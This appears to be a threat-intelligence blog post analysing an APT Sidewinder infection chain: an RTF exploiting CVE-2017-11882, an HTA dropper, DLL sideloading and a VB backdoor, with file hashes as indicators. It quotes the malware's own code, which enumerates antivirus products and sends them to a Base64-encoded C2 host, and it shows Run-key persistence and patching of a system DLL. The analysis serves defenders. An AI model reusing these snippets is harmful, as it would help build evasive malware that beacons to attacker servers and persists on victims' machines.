APT Sidewinder changes theirs TTPs to install their backdoor.

A new RTF (9001056791a03ec998f26805d462bc2ca336b2c3aeac2e210f73ff841dfe3eec) has just been discovered and it’s the same toolset that is used to create their exploit.

The RTF exploits CVE-2017–11882 to dowload a file HTA on hxxp://webserv-redir.net/includes/b7199e61/-1/5272/fdbfcfc1/final using mshtmll.dll and RunHTMLApplication and records that in caller.exe.

Sidewinder gives up the powershell in the HTA and all stuff is written in vbs. The goal of this change is to be more furtive. Many malware used Powershell and many papers describe how to log correctly the execution of powershell.

The HTA file checks with WMI the Antivirus Installed and send the informations on the C2.

var objWMIService = GetObject(“winmgmts:\\\\.\\root\\SecurityCenter2”);
 var colItems = objWMIService.ExecQuery(“Select * From AntiVirusProduct”, null, 48);
 var objItem = new Enumerator(colItems);


for (;!objItem.atEnd();objItem.moveNext()) {
 x += (objItem.item().displayName + ‘ ‘ + objItem.item().productState).replace(“ “,””);


if(iss(ll(x),”avast”)==0 && iss(ll(x),”360")==0)
 ointernet.open(“GET”, Base64Decode(“aHR0cDovL3dlYnNlcnYtcmVkaXIubmV0”)+Base64Decode(“L3BsdWdpbnMv”)+”-1/5272/true/true/”+x, 0);

if(iss(ll(x),”avast”)==0 && iss(ll(x),”kasper”)==0)
 ointernet.open(“GET”, Base64Decode(“aHR0cDovL3dlYnNlcnYtcmVkaXIubmV0”)+Base64Decode(“L3BsdWdpbnMv”)+”-1/5272/true/true/done”, 0);

If the AV are installed, the script is stopped.

The chains infections has changed a bit.

In the HTA file, there is a zip file. In the zipfile, there are an exe nammed FinalBot.exe. The file become Srvstr.exe in the directory: ExtractTo=din&”\Srvstr\dat”

The backdoor has a persistance in the run key.

oShell.RegWrite(“HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WinSrv”, pz, “REG_SZ”);

And the backoor is launched like that:

The HTA File decodes cmpbk32.dll whith two file hj.txt in \Srvstr\dat and call cmd.exe after copying in \Srvstr\dat.

the cmd.exe uses cmpbk32.dll by sideloding.

And in the entrypoint of the dll, cmpbk32.dll calls fn_0x10001000 for using WinExec to execute Srvstr.exe FFFFFFFF00001498 .

The backdoor has developped in VB and used the 8EBECD7C.dll (msvbvm60.dll modified).

data = readBinary(win&”\system32\msvbvm60.dll”)
 data = Replace(data,”__vba”,”__zbc”)
 writeBinary data,ExtractTo&”\8EBECD7C.dll”

For Intezer, the backdoor is the family of Sidewinder.



7c76c3c9e8569e102ba083a64d22cf46920e3566d7e940b54fb1e6c628e6610f Test.Zip

8c16ebad57e0288077ae58607b2967bf7b40761b20d783814d655280e9779e99 FinalBot.exe
dd5c74f195b7ba0cd06fe3b899125c09440ce14648080f520c06857e4001ff54 hj1.txt
7bd7cec82ee98feed5872325c2f8fd9f0ea3a2f6cd0cd32bcbe27dbbfd0d7da1 hj.txt